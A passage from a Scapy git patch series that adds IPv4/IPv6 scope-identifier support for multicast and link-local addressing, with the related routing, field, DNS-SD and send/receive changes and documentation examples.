deletion(-) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index d4fc1e03863..3bf12e65bff 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -767,7 +767,7 @@ class IKEv2_Notify(IKEv2_Payload): MultipleTypeField( [ (IPField("gw_id", "127.0.0.1"), lambda x: x.gw_id_type == 1), - (IP6Field("gw_id", "::1"), lambda x: x.gw_id_type == 5), + (IP6Field("gw_id", "::1"), lambda x: x.gw_id_type == 2), ], StrLenField("gw_id", "", length_from=lambda x: x.gw_id_len) ), From 97a49f32b99c2799d9e6a04969d2c66c231abd37 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 22 Aug 2024 16:00:26 +0300 Subject: [PATCH 1347/1632] Support for Scope Identifiers in IP addresses (#4461) --- doc/scapy/usage.rst | 42 ++++++++++++++- scapy/arch/linux/rtnetlink.py | 29 +++++++++- scapy/base_classes.py | 99 ++++++++++++++++++++++++++++++++--- scapy/fields.py | 85 ++++++++++++++---------------- scapy/layers/dns.py | 20 +++---- scapy/layers/hsrp.py | 2 +- scapy/layers/inet.py | 11 ++-- scapy/layers/inet6.py | 13 +++-- scapy/layers/l2.py | 15 +++--- scapy/libs/ethertypes.py | 2 + scapy/main.py | 2 +- scapy/route.py | 21 +++++--- scapy/route6.py | 6 +-- scapy/sendrecv.py | 87 ++++++++++++++++++++++-------- test/fields.uts | 2 +- test/linux.uts | 53 +++++++++++++++++-- 16 files changed, 370 insertions(+), 119 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index d4782e5b49f..a32792dbeaf 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -252,6 +252,31 @@ Now that we know how to manipulate packets. Let's see how to send them. The send Sent 1 packets. +.. _multicast: + +Multicast on layer 3: Scope Identifiers +--------------------------------------- + +.. index:: + single: Multicast + +.. note:: This feature is only available since Scapy 2.6.0. + +If you try to use multicast addresses (IPv4) or link-local addresses (IPv6), you'll notice that Scapy follows the routing table and takes the first entry. In order to specify which interface to use when looking through the routing table, Scapy supports scope identifiers (similar to RFC6874 but for both IPv6 and IPv4). + +.. code:: python + + >>> conf.checkIPaddr = False # answer IP will be != from the one we requested + # send on interface 'eth0' + >>> sr(IP(dst="224.0.0.1%eth0")/ICMP(), multi=True) + >>> sr(IPv6(dst="ff02::1%eth0")/ICMPv6EchoRequest(), multi=True) + +You can use both ``%eth0`` format or ``%15`` (the interface id) format. You can query those using ``conf.ifaces``. + +.. note:: + + Behind the scene, calling ``IP(dst="224.0.0.1%eth0")`` creates a ``ScopedIP`` object that contains ``224.0.0.1`` on the scope of the interface ``eth0``. If you are using an interface object (for instance ``conf.iface``), you can also craft that object. For instance:: + >>> pkt = IP(dst=ScopedIP("224.0.0.1", scope=conf.iface))/ICMP() Fuzzing ------- @@ -1488,9 +1513,24 @@ NBNS Query Request (find by NetbiosName) .. code:: - >>> conf.checkIPaddr = False # Mandatory because we are using a broadcast destination + >>> conf.checkIPaddr = False # Mandatory because we are using a broadcast destination and receiving unicast >>> sr1(IP(dst="192.168.0.255")/UDP()/NBNSHeader()/NBNSQueryRequest(QUESTION_NAME="DC1")) +mDNS Query Request +------------------ + +For instance, find all spotify connect devices. + +.. code:: + + >>> # For interface 'eth0' + >>> ans, _ = sr(IPv6(dst="ff02::fb%eth0")/UDP(sport=5353, dport=5353)/DNS(rd=0, qd=[DNSQR(qname='_spotify-connect._tcp.local', qtype="PTR")]), multi=True, timeout=2) + >>> ans.show() + +.. note:: + + As you can see, we used a scope identifier (``%eth0``) to specify on which interface we want to use the above multicast IP. + Advanced traceroute ------------------- diff --git a/scapy/arch/linux/rtnetlink.py b/scapy/arch/linux/rtnetlink.py index 7241949f720..9a920e2ce71 100644 --- a/scapy/arch/linux/rtnetlink.py +++ b/scapy/arch/linux/rtnetlink.py @@ -741,7 +741,7 @@ def _sr1_rtrequest(pkt: Packet) -> List[Packet]: if msg.nlmsg_type == 3 and nlmsgerr in msg and msg.status != 0: # NLMSG_DONE with errors if msg.data and msg.data[0].rta_type == 1: - log_loading.warning( + log_loading.debug( "Scapy RTNETLINK error on %s: '%s'. Please report !", pkt.sprintf("%nlmsg_type%"), msg.data[0].rta_data.decode(), @@ -908,6 +908,20 @@ def read_routes(): elif attr.rta_type == 0x07: # RTA_PREFSRC addr = attr.rta_data routes.append((net, mask, gw, iface, addr, metric)) + # Add multicast routes, as those are missing by default + for _iface in ifaces.values(): + if _iface['flags'].MULTICAST: + try: + addr = next( + x["address"] + for x in _iface["ips"] + if x["af_family"] == socket.AF_INET + ) + except StopIteration: + continue + routes.append(( + 0xe0000000, 0xf0000000, "0.0.0.0", _iface["name"], addr, 250 + )) return routes @@ -945,4 +959,17 @@ def read_routes6(): cset = scapy.utils6.construct_source_candidate_set(prefix, plen, devaddrs) if cset: routes.append((prefix, plen, nh, iface, cset, metric)) + # Add multicast routes, as those are missing by default + for _iface in ifaces.values(): + if _iface['flags'].MULTICAST: + addrs = [ + x["address"] + for x in _iface["ips"] + if x["af_family"] == socket.AF_INET6 + ] + if not addrs: + continue + routes.append(( + "ff00::", 8, "::", _iface["name"], addrs, 250 + )) return routes diff --git a/scapy/base_classes.py b/scapy/base_classes.py index a85df45d9e9..6940223dc3e 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -109,8 +109,75 @@ def __repr__(self): return "" % self.values +class _ScopedIP(str): + """ + A str that also holds extra attributes. + """ + __slots__ = ["scope"] + + def __init__(self, _: str) -> None: + self.scope = None + + def __repr__(self) -> str: + val = super(_ScopedIP, self).__repr__() + if self.scope is not None: + return "ScopedIP(%s, scope=%s)" % (val, repr(self.scope)) + return val + + +def ScopedIP(net: str, scope: Optional[Any] = None) -> _ScopedIP: + """ + An str that also holds extra attributes. + + Examples:: + + >>> ScopedIP("224.0.0.1%eth0") # interface 'eth0' + >>> ScopedIP("224.0.0.1%1") # interface index 1 + >>> ScopedIP("224.0.0.1", scope=conf.iface) + """ + if "%" in net: + try: + net, scope = net.split("%", 1) + except ValueError: + raise Scapy_Exception("Scope identifier can only be present once !") + if scope is not None: + from scapy.interfaces import resolve_iface, network_name, dev_from_index + try: + iface = dev_from_index(int(scope)) + except (ValueError, TypeError): + iface = resolve_iface(scope) + if not iface.is_valid(): + raise Scapy_Exception( + "RFC6874 scope identifier '%s' could not be resolved to a " + "valid interface !" % scope + ) + scope = network_name(iface) + x = _ScopedIP(net) + x.scope = scope + return x + + class Net(Gen[str]): - """Network object from an IP address or hostname and mask""" + """ + Network object from an IP address or hostname and mask + + Examples: + + - With mask:: + + >>> list(Net("192.168.0.1/24")) + ['192.168.0.0', '192.168.0.1', ..., '192.168.0.255'] + + - With 'end':: + + >>> list(Net("192.168.0.100", "192.168.0.200")) + ['192.168.0.100', '192.168.0.101', ..., '192.168.0.200'] + + - With 'scope' (for multicast):: + + >>> Net("224.0.0.1%lo") + >>> Net("224.0.0.1", scope=conf.iface) + """ name = "Net" # type: str family = socket.AF_INET # type: int max_mask = 32 # type: int @@ -143,11 +210,16 @@ def int2ip(val): # type: (int) -> str return socket.inet_ntoa(struct.pack('!I', val)) - def __init__(self, net, stop=None): - # type: (str, Union[None, str]) -> None + def __init__(self, net, stop=None, scope=None): + # type: (str, Optional[str], Optional[str]) -> None if "*" in net: raise Scapy_Exception("Wildcards are no longer accepted in %s()" % self.__class__.__name__) + self.scope = None + if "%" in net: + net = ScopedIP(net) + if isinstance(net, _ScopedIP): + self.scope = net.scope if stop is None: try: net, mask = net.split("/", 1) @@ -174,7 +246,10 @@ def __iter__(self): # type: () -> Iterator[str] # Python 2 won't handle huge (> sys.maxint) values in range() for i in range(self.count): - yield self.int2ip(self.start + i) + yield ScopedIP( + self.int2ip(self.start + i), + scope=self.scope, + ) def __len__(self): # type: () -> int @@ -187,20 +262,28 @@ def __iterlen__(self): def choice(self): # type: () -> str - return self.int2ip(random.randint(self.start, self.stop)) + return ScopedIP( + self.int2ip(random.randint(self.start, self.stop)), + scope=self.scope, + ) def __repr__(self): # type: () -> str + scope_id_repr = "" + if self.scope: + scope_id_repr = ", scope=%s" % repr(self.scope) if self.mask is not None: - return '%s("%s/%d")' % ( + return '%s("%s/%d"%s)' % ( self.__class__.__name__, self.net, self.mask, + scope_id_repr, ) - return '%s("%s", "%s")' % ( + return '%s("%s", "%s"%s)' % ( self.__class__.__name__, self.int2ip(self.start), self.int2ip(self.stop), + scope_id_repr, ) def __eq__(self, other): @@ -220,7 +303,7 @@ def __ne__(self, other): def __hash__(self): # type: () -> int - return hash(("scapy.Net", self.family, self.start, self.stop)) + return hash(("scapy.Net", self.family, self.start, self.stop, self.scope)) def __contains__(self, other): # type: (Any) -> bool diff --git a/scapy/fields.py b/scapy/fields.py index 94d79d7dfd6..d081a095f16 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -37,8 +37,13 @@ from scapy.utils import inet_aton, inet_ntoa, lhex, mac2str, str2mac, EDecimal from scapy.utils6 import in6_6to4ExtractAddr, in6_isaddr6to4, \ in6_isaddrTeredo, in6_ptop, Net6, teredoAddrExtractInfo -from scapy.base_classes import Gen, Net, BasePacket, Field_metaclass -from scapy.error import warning +from scapy.base_classes import ( + _ScopedIP, + BasePacket, + Field_metaclass, + Net, + ScopedIP, +) # Typing imports from typing import ( @@ -848,7 +853,10 @@ def h2i(self, pkt, x): # type: (Optional[Packet], Union[AnyStr, List[AnyStr]]) -> Any if isinstance(x, bytes): x = plain_str(x) # type: ignore - if isinstance(x, str): + if isinstance(x, _ScopedIP): + return x + elif isinstance(x, str): + x = ScopedIP(x) try: inet_aton(x) except socket.error: @@ -893,6 +901,8 @@ def any2i(self, pkt, x): def i2repr(self, pkt, x): # type: (Optional[Packet], Union[str, Net]) -> str + if isinstance(x, _ScopedIP) and x.scope: + return repr(x) r = self.resolve(self.i2h(pkt, x)) return r if isinstance(r, str) else repr(r) @@ -902,29 +912,16 @@ def randval(self): class SourceIPField(IPField): - __slots__ = ["dstname"] - - def __init__(self, name, dstname): - # type: (str, Optional[str]) -> None + def __init__(self, name): + # type: (str) -> None IPField.__init__(self, name, None) - self.dstname = dstname def __findaddr(self, pkt): - # type: (Packet) -> str + # type: (Packet) -> Optional[str] if conf.route is None: # unused import, only to initialize conf.route import scapy.route # noqa: F401 - dst = ("0.0.0.0" if self.dstname is None - else getattr(pkt, self.dstname) or "0.0.0.0") - if isinstance(dst, (Gen, list)): - r = { - conf.route.route(str(daddr)) - for daddr in dst - } # type: Set[Tuple[str, str, str]] - if len(r) > 1: - warning("More than one possible route for %r" % (dst,)) - return min(r)[1] - return conf.route.route(dst)[1] + return pkt.route()[1] or conf.route.route()[1] def i2m(self, pkt, x): # type: (Optional[Packet], Optional[Union[str, Net]]) -> bytes @@ -945,18 +942,21 @@ def __init__(self, name, default): Field.__init__(self, name, default, "16s") def h2i(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> str + # type: (Optional[Packet], Any) -> str if isinstance(x, bytes): x = plain_str(x) - if isinstance(x, str): + if isinstance(x, _ScopedIP): + return x + elif isinstance(x, str): + x = ScopedIP(x) try: - x = in6_ptop(x) + x = ScopedIP(in6_ptop(x), scope=x.scope) except socket.error: return Net6(x) # type: ignore elif isinstance(x, tuple): if len(x) != 2: raise ValueError("Invalid IPv6 format") - return Net6(*x) + return Net6(*x) # type: ignore elif isinstance(x, list): x = [self.h2i(pkt, n) for n in x] return x # type: ignore @@ -990,6 +990,8 @@ def i2repr(self, pkt, x): elif in6_isaddr6to4(x): # print encapsulated address vaddr = in6_6to4ExtractAddr(x) return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr) + elif isinstance(x, _ScopedIP) and x.scope: + return repr(x) r = self.i2h(pkt, x) # No specific information to return return r if isinstance(r, str) else repr(r) @@ -999,36 +1001,27 @@ def randval(self): class SourceIP6Field(IP6Field): - __slots__ = ["dstname"] - - def __init__(self, name, dstname): - # type: (str, str) -> None + def __init__(self, name): + # type: (str) -> None IP6Field.__init__(self, name, None) - self.dstname = dstname + + def __findaddr(self, pkt): + # type: (Packet) -> Optional[str] + if conf.route6 is None: + # unused import, only to initialize conf.route + import scapy.route6 # noqa: F401 + return pkt.route()[1] def i2m(self, pkt, x): # type: (Optional[Packet], Optional[Union[str, Net6]]) -> bytes - if x is None: - dst = ("::" if self.dstname is None else - getattr(pkt, self.dstname) or "::") - iff, x, nh = conf.route6.route(dst) + if x is None and pkt is not None: + x = self.__findaddr(pkt) return super(SourceIP6Field, self).i2m(pkt, x) def i2h(self, pkt, x): # type: (Optional[Packet], Optional[Union[str, Net6]]) -> str - if x is None: - if conf.route6 is None: - # unused import, only to initialize conf.route6 - import scapy.route6 # noqa: F401 - dst = ("::" if self.dstname is None else getattr(pkt, self.dstname)) # noqa: E501 - if isinstance(dst, (Gen, list)): - r = {conf.route6.route(str(daddr)) - for daddr in dst} - if len(r) > 1: - warning("More than one possible route for %r" % (dst,)) - x = min(r)[1] - else: - x = conf.route6.route(dst)[1] + if x is None and pkt is not None: + x = self.__findaddr(pkt) return super(SourceIP6Field, self).i2h(pkt, x) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 0f1b3deb623..eb566f63bdd 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -27,7 +27,7 @@ read_nameservers, ) from scapy.ansmachine import AnsweringMachine -from scapy.base_classes import Net +from scapy.base_classes import Net, ScopedIP from scapy.config import conf from scapy.compat import orb, raw, chb, bytes_encode, plain_str from scapy.error import log_runtime, warning, Scapy_Exception @@ -1918,16 +1918,14 @@ def __init__(self, ): SndRcvList.__init__(self, res, name, stats) - def show(self, *args, **kwargs): - # type: (*Any, **Any) -> None + def show(self, types=['PTR', 'SRV'], alltypes=False): + # type: (List[str], bool) -> None """ Print the list of discovered services. :param types: types to show. Default ['PTR', 'SRV'] :param alltypes: show all types. Default False """ - types = kwargs.get("types", ['PTR', 'SRV']) - alltypes = kwargs.get("alltypes", False) if alltypes: types = None data = list() # type: List[Tuple[str | List[str], ...]] @@ -1969,8 +1967,10 @@ def show(self, *args, **kwargs): @conf.commands.register def dnssd(service="_services._dns-sd._udp.local", - af=socket.AF_INET6, + af=socket.AF_INET, qtype="PTR", + iface=None, + verbose=2, timeout=3): """ Performs a DNS-SD (RFC6763) request @@ -1978,15 +1978,15 @@ def dnssd(service="_services._dns-sd._udp.local", :param service: the service name to query (e.g. _spotify-connect._tcp.local) :param af: the transport to use. socket.AF_INET or socket.AF_INET6 :param qtype: the type to use in the mDNS. Either TXT, PTR or SRV. - :param ret: return instead of printing + :param iface: the interface to do this discovery on. """ if af == socket.AF_INET: - pkt = IP(dst="224.0.0.251") + pkt = IP(dst=ScopedIP("224.0.0.251", iface), ttl=255) elif af == socket.AF_INET6: - pkt = IPv6(dst="ff02::fb") + pkt = IPv6(dst=ScopedIP("ff02::fb", iface)) else: return pkt /= UDP(sport=5353, dport=5353) pkt /= DNS(rd=0, qd=[DNSQR(qname=service, qtype=qtype)]) - ans, _ = sr(pkt, multi=True, timeout=timeout) + ans, _ = sr(pkt, multi=True, timeout=timeout, verbose=verbose) return DNSSDResult(ans.res) diff --git a/scapy/layers/hsrp.py b/scapy/layers/hsrp.py index ad9554382f9..82e82606357 100644 --- a/scapy/layers/hsrp.py +++ b/scapy/layers/hsrp.py @@ -48,7 +48,7 @@ class HSRPmd5(Packet): ByteEnumField("algo", 0, {1: "MD5"}), ByteField("padding", 0x00), XShortField("flags", 0x00), - SourceIPField("sourceip", None), + SourceIPField("sourceip"), XIntField("keyid", 0x00), StrFixedLenField("authdigest", b"\00" * 16, 16)] diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index ed8ce7e2ae9..a361664a681 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -18,7 +18,7 @@ from scapy.utils import checksum, do_graph, incremental_label, \ linehexdump, strxor, whois, colgen from scapy.ansmachine import AnsweringMachine -from scapy.base_classes import Gen, Net +from scapy.base_classes import Gen, Net, _ScopedIP from scapy.data import ETH_P_IP, ETH_P_ALL, DLT_RAW, DLT_RAW_ALT, DLT_IPV4, \ IP_PROTOS, TCP_SERVICES, UDP_SERVICES from scapy.layers.l2 import ( @@ -543,7 +543,7 @@ class IP(Packet, IPTools): ByteEnumField("proto", 0, IP_PROTOS), XShortField("chksum", None), # IPField("src", "127.0.0.1"), - Emph(SourceIPField("src", "dst")), + Emph(SourceIPField("src")), Emph(DestIPField("dst", "127.0.0.1")), PacketListField("options", [], IPOption, length_from=lambda p:p.ihl * 4 - 20)] # noqa: E501 @@ -569,12 +569,15 @@ def extract_padding(self, s): def route(self): dst = self.dst - if isinstance(dst, Gen): + scope = None + if isinstance(dst, (Net, _ScopedIP)): + scope = dst.scope + if isinstance(dst, (Gen, list)): dst = next(iter(dst)) if conf.route is None: # unused import, only to initialize conf.route import scapy.route # noqa: F401 - return conf.route.route(dst) + return conf.route.route(dst, dev=scope) def hashret(self): if ((self.proto == socket.IPPROTO_ICMP) and diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 18d5f2f2fda..f1ecc210c06 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -20,7 +20,7 @@ from scapy.arch import get_if_hwaddr from scapy.as_resolvers import AS_resolver_riswhois -from scapy.base_classes import Gen +from scapy.base_classes import Gen, _ScopedIP from scapy.compat import chb, orb, raw, plain_str, bytes_encode from scapy.consts import WINDOWS from scapy.config import conf @@ -149,7 +149,7 @@ def neighsol(addr, src, iface, timeout=1, chainCC=0): def getmacbyip6(ip6, chainCC=0): # type: (str, int) -> Optional[str] """ - Returns the MAC address used to reach a given IPv6 address. + Returns the MAC address of the next hop used to reach a given IPv6 address. neighborCache.get() method is used on instantiated neighbor cache. Resolution mechanism is described in associated doc string. @@ -319,15 +319,18 @@ class IPv6(_IPv6GuessPayload, Packet, IPTools): ShortField("plen", None), ByteEnumField("nh", 59, ipv6nh), ByteField("hlim", 64), - SourceIP6Field("src", "dst"), # dst is for src @ selection + SourceIP6Field("src"), DestIP6Field("dst", "::1")] def route(self): """Used to select the L2 address""" dst = self.dst - if isinstance(dst, Gen): + scope = None + if isinstance(dst, (Net6, _ScopedIP)): + scope = dst.scope + if isinstance(dst, (Gen, list)): dst = next(iter(dst)) - return conf.route6.route(dst) + return conf.route6.route(dst, dev=scope) def mysummary(self): return "%s > %s (%i)" % (self.src, self.dst, self.nh) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 12c302dfd18..48dfbf5d5fd 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -14,7 +14,7 @@ from scapy.ansmachine import AnsweringMachine from scapy.arch import get_if_addr, get_if_hwaddr -from scapy.base_classes import Gen, Net +from scapy.base_classes import Gen, Net, _ScopedIP from scapy.compat import chb from scapy.config import conf from scapy import consts @@ -134,7 +134,7 @@ def __repr__(self): def getmacbyip(ip, chainCC=0): # type: (str, int) -> Optional[str] """ - Returns the MAC address used to reach a given IP address. + Returns the destination MAC address used to reach a given IP address. This will follow the routing table and will issue an ARP request if necessary. Special cases (multicast, etc.) are also handled. @@ -492,13 +492,13 @@ class ARP(Packet): ), MultipleTypeField( [ - (SourceIPField("psrc", "pdst"), + (SourceIPField("psrc"), (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4, lambda pkt, val: pkt.ptype == 0x0800 and ( pkt.plen == 4 or (pkt.plen is None and (val is None or valid_net(val))) ))), - (SourceIP6Field("psrc", "pdst"), + (SourceIP6Field("psrc"), (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16, lambda pkt, val: pkt.ptype == 0x86dd and ( pkt.plen == 16 or (pkt.plen is None and @@ -561,12 +561,15 @@ def route(self): fld, dst = cast(Tuple[MultipleTypeField, str], self.getfield_and_val("pdst")) fld_inner, dst = fld._find_fld_pkt_val(self, dst) + scope = None + if isinstance(dst, (Net, _ScopedIP)): + scope = dst.scope if isinstance(dst, Gen): dst = next(iter(dst)) if isinstance(fld_inner, IP6Field): - return conf.route6.route(dst) + return conf.route6.route(dst, dev=scope) elif isinstance(fld_inner, IPField): - return conf.route.route(dst) + return conf.route.route(dst, dev=scope) else: return None, None, None diff --git a/scapy/libs/ethertypes.py b/scapy/libs/ethertypes.py index c93aaeac0bf..6ce6850294b 100644 --- a/scapy/libs/ethertypes.py +++ b/scapy/libs/ethertypes.py @@ -35,6 +35,8 @@ */ """ +# To quote Python's get-pip: + # Hi There! # # You may be wondering what this giant blob of binary data here is, you might diff --git a/scapy/main.py b/scapy/main.py index 0fdd4a1982a..d84c6e3f8c4 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -61,7 +61,7 @@ "the wires and in the waves.", "Jean-Claude Van Damme"), ("We are in France, we say Skappee. OK? Merci.", "Sebastien Chabal"), ("Wanna support scapy? Star us on GitHub!", "Satoshi Nakamoto"), - ("What is dead may never die!", "Python 2"), + ("I'll be back.", "Python 2"), ] diff --git a/scapy/route.py b/scapy/route.py index af1411aa329..9e078bfbbc7 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -38,7 +38,7 @@ def __init__(self): def invalidate_cache(self): # type: () -> None - self.cache = {} # type: Dict[str, Tuple[str, str, str]] + self.cache = {} # type: Dict[Tuple[str, Optional[str]], Tuple[str, str, str]] def resync(self): # type: () -> None @@ -165,11 +165,13 @@ def ifadd(self, iff, addr): the_net = the_rawaddr & the_msk self.routes.append((the_net, the_msk, '0.0.0.0', iff, the_addr, 1)) - def route(self, dst=None, verbose=conf.verb, _internal=False): - # type: (Optional[str], int, bool) -> Tuple[str, str, str] + def route(self, dst=None, dev=None, verbose=conf.verb, _internal=False): + # type: (Optional[str], Optional[str], int, bool) -> Tuple[str, str, str] """Returns the IPv4 routes to a host. :param dst: the IPv4 of the destination host + :param dev: (optional) filtering is performed to limit search to route + associated to that interface. :returns: tuple (iface, output_ip, gateway_ip) where - ``iface``: the interface used to connect to the host @@ -182,8 +184,8 @@ def route(self, dst=None, verbose=conf.verb, _internal=False): dst = plain_str(dst) except UnicodeDecodeError: raise TypeError("Unknown IP address input (bytes)") - if dst in self.cache: - return self.cache[dst] + if (dst, dev) in self.cache: + return self.cache[(dst, dev)] # Transform "192.168.*.1-5" to one IP of the set _dst = dst.split("/")[0].replace("*", "0") while True: @@ -198,6 +200,8 @@ def route(self, dst=None, verbose=conf.verb, _internal=False): for d, m, gw, i, a, me in self.routes: if not a: # some interfaces may not currently be connected continue + if dev is not None and i != dev: + continue aa = atol(a) if aa == atol_dst: paths.append( @@ -208,8 +212,9 @@ def route(self, dst=None, verbose=conf.verb, _internal=False): if not paths: if verbose: - warning("No route found (no default route?)") - return conf.loopback_name, "0.0.0.0", "0.0.0.0" + warning("No route found for IPv4 destination %s " + "(no default route?)", dst) + return (dev or conf.loopback_name, "0.0.0.0", "0.0.0.0") # Choose the more specific route # Sort by greatest netmask and use metrics as a tie-breaker paths.sort(key=lambda x: (-x[0], x[1])) @@ -219,7 +224,7 @@ def route(self, dst=None, verbose=conf.verb, _internal=False): if ret[1] == "0.0.0.0" and not _internal: # Then get the source from route(gw) ret = (ret[0], self.route(ret[2], _internal=True)[1], ret[2]) - self.cache[dst] = ret + self.cache[(dst, dev)] = ret return ret def get_if_bcast(self, iff): diff --git a/scapy/route6.py b/scapy/route6.py index dd86b26ca6b..3862644c96a 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -220,7 +220,7 @@ def ifadd(self, iff, addr): self.ipv6_ifaces.add(iff) def route(self, dst="", dev=None, verbose=conf.verb): - # type: (str, Optional[Any], int) -> Tuple[str, str, str] + # type: (str, Optional[str], int) -> Tuple[str, str, str] """ Provide best route to IPv6 destination address, based on Scapy internal routing table content. @@ -254,7 +254,7 @@ def route(self, dst="", dev=None, verbose=conf.verb): # Choose a valid IPv6 interface while dealing with link-local addresses if dev is None and (in6_islladdr(dst) or in6_ismlladdr(dst)): - dev = conf.iface # default interface + dev = str(conf.iface) # default interface # Check if the default interface supports IPv6! if dev not in self.ipv6_ifaces and self.ipv6_ifaces: @@ -309,7 +309,7 @@ def route(self, dst="", dev=None, verbose=conf.verb): if verbose: warning("No route found for IPv6 destination %s " "(no default route?)", dst) - return (conf.loopback_name, "::", "::") + return (dev or conf.loopback_name, "::", "::") # Sort with longest prefix first then use metrics as a tie-breaker paths.sort(key=lambda x: (-x[0], x[1])) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 4e020d70dba..18775d50291 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -14,6 +14,7 @@ import socket import subprocess import time +import warnings from scapy.compat import plain_str from scapy.data import ETH_P_ALL @@ -452,13 +453,15 @@ def _send(x, # type: _PacketIterable @conf.commands.register def send(x, # type: _PacketIterable - iface=None, # type: Optional[_GlobInterfaceType] **kargs # type: Any ): # type: (...) -> Optional[PacketList] """ Send packets at layer 3 + This determines the interface (or L2 source to use) based on the routing + table: conf.route / conf.route6 + :param x: the packets :param inter: time (in s) between two packets (default 0) :param loop: send packet indefinitely (default 0) @@ -467,11 +470,18 @@ def send(x, # type: _PacketIterable :param realtime: check that a packet was sent before sending the next one :param return_packets: return the sent packets :param socket: the socket to use (default is conf.L3socket(kargs)) - :param iface: the interface to send the packets on :param monitor: (not on linux) send in monitor mode :returns: None """ - iface, ipv6 = _interface_selection(iface, x) + if "iface" in kargs: + # Warn that it isn't used. + warnings.warn( + "'iface' has no effect on L3 I/O send(). For multicast/link-local " + "see https://scapy.readthedocs.io/en/latest/usage.html#multicast", + SyntaxWarning, + ) + del kargs["iface"] + iface, ipv6 = _interface_selection(x) return _send( x, lambda iface: iface.l3socket(ipv6), @@ -649,10 +659,7 @@ def _parse_tcpreplay_result(stdout_b, stderr_b, argv): return {} -def _interface_selection(iface, # type: Optional[_GlobInterfaceType] - packet # type: _PacketIterable - ): - # type: (...) -> Tuple[NetworkInterface, bool] +def _interface_selection(packet: _PacketIterable) -> Tuple[NetworkInterface, bool]: """ Select the network interface according to the layer 3 destination """ @@ -664,21 +671,17 @@ def _interface_selection(iface, # type: Optional[_GlobInterfaceType] ipv6 = True except (ValueError, OSError): pass - if iface is None: - try: - iff = resolve_iface(_iff or conf.iface) - except AttributeError: - iff = None - return iff or conf.iface, ipv6 - - return resolve_iface(iface), ipv6 + try: + iff = resolve_iface(_iff or conf.iface) + except AttributeError: + iff = None + return iff or conf.iface, ipv6 @conf.commands.register def sr(x, # type: _PacketIterable promisc=None, # type: Optional[bool] filter=None, # type: Optional[str] - iface=None, # type: Optional[_GlobInterfaceType] nofilter=0, # type: int *args, # type: Any **kargs # type: Any @@ -686,8 +689,19 @@ def sr(x, # type: _PacketIterable # type: (...) -> Tuple[SndRcvList, PacketList] """ Send and receive packets at layer 3 + + This determines the interface (or L2 source to use) based on the routing + table: conf.route / conf.route6 """ - iface, ipv6 = _interface_selection(iface, x) + if "iface" in kargs: + # Warn that it isn't used. + warnings.warn( + "'iface' has no effect on L3 I/O sr(). For multicast/link-local " + "see https://scapy.readthedocs.io/en/latest/usage.html#multicast", + SyntaxWarning, + ) + del kargs["iface"] + iface, ipv6 = _interface_selection(x) s = iface.l3socket(ipv6)( promisc=promisc, filter=filter, iface=iface, nofilter=nofilter, @@ -702,7 +716,18 @@ def sr1(*args, **kargs): # type: (*Any, **Any) -> Optional[Packet] """ Send packets at layer 3 and return only the first answer + + This determines the interface (or L2 source to use) based on the routing + table: conf.route / conf.route6 """ + if "iface" in kargs: + # Warn that it isn't used. + warnings.warn( + "'iface' has no effect on L3 I/O sr1(). For multicast/link-local " + "see https://scapy.readthedocs.io/en/latest/usage.html#multicast", + SyntaxWarning, + ) + del kargs["iface"] ans, _ = sr(*args, **kargs) if ans: return cast(Packet, ans[0][1]) @@ -926,13 +951,23 @@ def srflood(x, # type: _PacketIterable # type: (...) -> Tuple[SndRcvList, PacketList] """Flood and receive packets at layer 3 + This determines the interface (or L2 source to use) based on the routing + table: conf.route / conf.route6 + :param prn: function applied to packets received :param unique: only consider packets whose print :param nofilter: put 1 to avoid use of BPF filters :param filter: provide a BPF filter - :param iface: listen answers only on the given interface """ - iface, ipv6 = _interface_selection(iface, x) + if "iface" in kargs: + # Warn that it isn't used. + warnings.warn( + "'iface' has no effect on L3 I/O srflood(). For multicast/link-local " + "see https://scapy.readthedocs.io/en/latest/usage.html#multicast", + SyntaxWarning, + ) + del kargs["iface"] + iface, ipv6 = _interface_selection(x) s = iface.l3socket(ipv6)( promisc=promisc, filter=filter, iface=iface, nofilter=nofilter, @@ -946,7 +981,6 @@ def srflood(x, # type: _PacketIterable def sr1flood(x, # type: _PacketIterable promisc=None, # type: Optional[bool] filter=None, # type: Optional[str] - iface=None, # type: Optional[_GlobInterfaceType] nofilter=0, # type: int *args, # type: Any **kargs # type: Any @@ -954,13 +988,24 @@ def sr1flood(x, # type: _PacketIterable # type: (...) -> Optional[Packet] """Flood and receive packets at layer 3 and return only the first answer + This determines the interface (or L2 source to use) based on the routing + table: conf.route / conf.route6 + :param prn: function applied to packets received :param verbose: set verbosity level :param nofilter: put 1 to avoid use of BPF filters :param filter: provide a BPF filter :param iface: listen answers only on the given interface """ - iface, ipv6 = _interface_selection(iface, x) + if "iface" in kargs: + # Warn that it isn't used. + warnings.warn( + "'iface' has no effect on L3 I/O sr1flood(). For multicast/link-local " + "see https://scapy.readthedocs.io/en/latest/usage.html#multicast", + SyntaxWarning, + ) + del kargs["iface"] + iface, ipv6 = _interface_selection(x) s = iface.l3socket(ipv6)( promisc=promisc, filter=filter, nofilter=nofilter, iface=iface, diff --git a/test/fields.uts b/test/fields.uts index 81b2566683c..b64300b8279 100644 